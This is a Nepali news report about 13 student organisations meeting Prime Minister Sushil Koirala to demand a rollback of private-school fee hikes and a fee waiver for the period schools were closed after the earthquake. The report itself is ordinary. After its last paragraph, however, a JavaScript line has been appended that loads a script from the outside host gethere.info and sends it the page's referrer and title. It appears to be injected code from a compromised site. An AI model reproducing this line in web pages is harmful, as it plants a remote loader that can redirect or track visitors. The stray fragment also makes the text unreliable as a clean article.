बिद्यार्थी प्रधानमन्त्री भेट

विभिन्न १३ विद्यार्थी सङ्गठनले निजी विद्यालयले गरेको शुल्कवृद्धि फिर्ता लिनुपर्ने र भूकम्पका कारण बन्द भएको अवधिको शुल्क मिनाहा गर्नुपर्ने माग राख्दै प्रधानमन्त्री सुशील कोइरालालाई ज्ञापनपत्र बुझाएका छन्। प्रधानमन्त्री निवास बालुवाटारमा ज्ञापनपत्र बुझ्दै प्रधानमन्त्रीले निजी विद्यालयको शुल्कवृद्धि फिर्ता गर्न र भूकम्पका कारण बन्द भएको अवधिको शुल्क मिनाहा गर्न निर्देशन दिने भन्दै आन्दोलनका कार्यक्रम फिर्ता लिन विद्यार्थी नेताहरुलाई आग्रह गर्नुभएको थियो। प्रधानमन्त्रीले आफ्ना मागबारे अन्य दलका नेताहरुलाई पनि जानकारी गराउन विद्यार्थी नेताहरुलाई सुझाव दिनुभएको थियो। प्रधानमन्त्रीले देशको भविष्य युवाहरुको हातमा रहेको बताउँदै विपद्को बेला सबै मिलेर अगाडि बढ्नुपर्ने बताउनुभएको थियो।

यसअघि गत वैशाख ६ गते निजी विद्यालयले गरेको शुल्कवृद्धि फिर्ता गर्ने १० बुँदे सहमति भए पनि त्यसको कार्यान्वयन गर्न पटक÷पटक आग्रह गरेपनि निजी विद्यालयले नमानेपछि १३ विद्यार्थी सङ्गठनले शनिबार आन्दोलनका कार्यक्रम घोषणा गरेका थिए। विद्यार्थी सङ्गठनले जेठ ३१ गते प्रधानमन्त्रीलाई भेटेर ध्यानाकर्षण गराउने, ३२ गते जिल्लास्तरीय विद्यार्थीको बैठक बसी संयुक्त अनुगमन टोली निर्माण गर्ने र असार १ गतेदेखि सम्पूर्ण शिक्षण संस्थाका अभिभावकसमेतलाई समेटेर संयुक्त सङ्घर्ष समिति बनाउने निर्णय गरेका थिए।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;